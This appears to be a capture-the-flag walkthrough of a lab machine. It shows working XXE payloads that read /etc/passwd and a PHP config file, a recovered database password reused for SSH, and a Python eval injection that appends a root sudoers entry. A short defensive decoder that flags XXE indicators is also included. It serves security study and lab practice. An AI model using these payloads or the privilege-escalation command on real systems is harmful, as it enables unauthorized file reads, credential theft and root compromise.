We have XML injection (XXE) here: http://10.10.11.100/log_submit.php

I capture the request in Burp. The data we enter is sent after `data=`, base64 encoded and then URL encoded (key characters only).

Where we put `&xxe;` we get the injection. We tested this with /etc/passwd.

The decoded value of `data=`:

```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<bugreport>
  <title>&xxe;</title>
  <cwe>hack</cwe>
  <cvss>hack</cvss>
  <reward>20</reward>
</bugreport>
```

Base64 (and URL-encoded) payload as sent:

```
PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4NCjwhRE9DVFlQRSBmb28gWyA8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiPiBdPg0KCQk8YnVncmVwb3J0Pg0KCQk8dGl0bGU%2bJnh4ZTs8L3RpdGxlPg0KCQk8Y3dlPmhhY2s8L2N3ZT4NCgkJPGN2c3M%2baGFjazwvY3Zzcz4NCgkJPHJld2FyZD4yMDwvcmV3YXJkPg0KCQk8L2J1Z3JlcG9ydD4%3d
```

We can read the db.php file we found earlier using the php://filter wrapper, which returns it base64 encoded:

```xml
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE replace [<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=db.php"> ]>
<bugreport>
  <title>&xxe;</title>
  <cwe>hack</cwe>
  <cvss>hack</cvss>
  <reward>20</reward>
</bugreport>
```
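The encoding chain described above (XML, then base64, then URL-encoding of `+` and `=`) is what any log review or request filter has to undo before it can see the DOCTYPE at all. The Python below is an added example, not code from this write-up or from the target application: it reverses that chain on the captured body, flags the XXE indicators in both payloads above, and also covers parameter entities, which the page's payloads do not use.

```python
import base64
import re
from urllib.parse import parse_qs, quote

# Request body captured in the write-up: bug-report XML sent to log_submit.php as
# data=<base64>, with '+' and '=' URL-encoded.
CAPTURED_BODY = (
    "data=PD94bWwgIHZlcnNpb249IjEuMCIgZW5jb2Rpbmc9IklTTy04ODU5LTEiPz4NCjwhRE9DVFlQRSBmb28g"
    "WyA8IUVOVElUWSB4eGUgU1lTVEVNICJmaWxlOi8vL2V0Yy9wYXNzd2QiPiBdPg0KCQk8YnVncmVwb3J0Pg0KCQk8"
    "dGl0bGU%2bJnh4ZTs8L3RpdGxlPg0KCQk8Y3dlPmhhY2s8L2N3ZT4NCgkJPGN2c3M%2baGFjazwvY3Zzcz4NCgkJ"
    "PHJld2FyZD4yMDwvcmV3YXJkPg0KCQk8L2J1Z3JlcG9ydD4%3d"
)
# The write-up's php://filter payload, reconstructed here as a constructed sample.
PHP_FILTER_XML = (
    '<?xml version="1.0" encoding="ISO-8859-1"?>'
    '<!DOCTYPE replace [<!ENTITY xxe SYSTEM '
    '"php://filter/convert.base64-encode/resource=db.php"> ]>'
    '<bugreport><title>&xxe;</title><reward>20</reward></bugreport>'
)
# Things a bug-report XML has no business containing. The entity pattern also
# matches parameter entities (<!ENTITY % name SYSTEM ...>), not used on this page.
INDICATORS = [
    ("doctype", re.compile(r"<!DOCTYPE", re.I)),
    ("external-entity", re.compile(r"<!ENTITY\s+(?:%\s+)?\S+\s+(?:SYSTEM|PUBLIC)", re.I)),
    ("file-uri", re.compile(r"\bfile://", re.I)),
    ("php-filter", re.compile(r"php://filter", re.I)),
]

def encode_submission(xml_text):
    """Build a body the way the page's client does: base64, then URL-encode '+' and '='."""
    b64 = base64.b64encode(xml_text.encode("latin-1")).decode("ascii")
    return "data=" + quote(b64, safe="/")  # '/' stays bare, as in the captured payload

def decode_submission(body):
    """Undo that chain: form-decode (restores '+' and '='), then base64-decode data."""
    raw = parse_qs(body).get("data", [""])[0]
    try:
        return base64.b64decode(raw, validate=True).decode("latin-1")
    except ValueError:  # binascii.Error is a ValueError subclass: not base64 at all
        return ""

def inspect_body(body):
    """Decode one request body and report its XXE indicators and entity SYSTEM targets."""
    xml = decode_submission(body)
    return {
        "xml": xml,
        "indicators": [name for name, rx in INDICATORS if rx.search(xml)],
        "entity_targets": re.findall(r'SYSTEM\s+"([^"]+)"', xml, re.I),
    }
```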

We dump the db file using the payload above; decoding the base64 in the response gives db.php:

```php
<?php

// TODO -> Implement login system with the database.

$dbserver = "localhost";
$dbname = "bounty";
$dbusername = "admin";
$dbpassword = "m19RoAU0hP41A1sTsq6K";
$testuser = "test";

?>
```

We can SSH in with:

```
development:m19RoAU0hP41A1sTsq6K
```

We can run a ticket creation Python script as root. The script passes the ticket code to eval(), which we can exploit.

I create a test file named test.md:

```markdown
# Skytrain Inc Ticket

## Ticket to Destination: London

__Ticket Code:__

**32+110+43+ __import__('os').system('whoami')**
```

I make a ticket that echoes a development entry into /etc/sudoers so I can su to root:

```markdown
**32+110+43+ __import__('os').system('echo "development ALL=(ALL) ALL" >> /etc/sudoers')**
```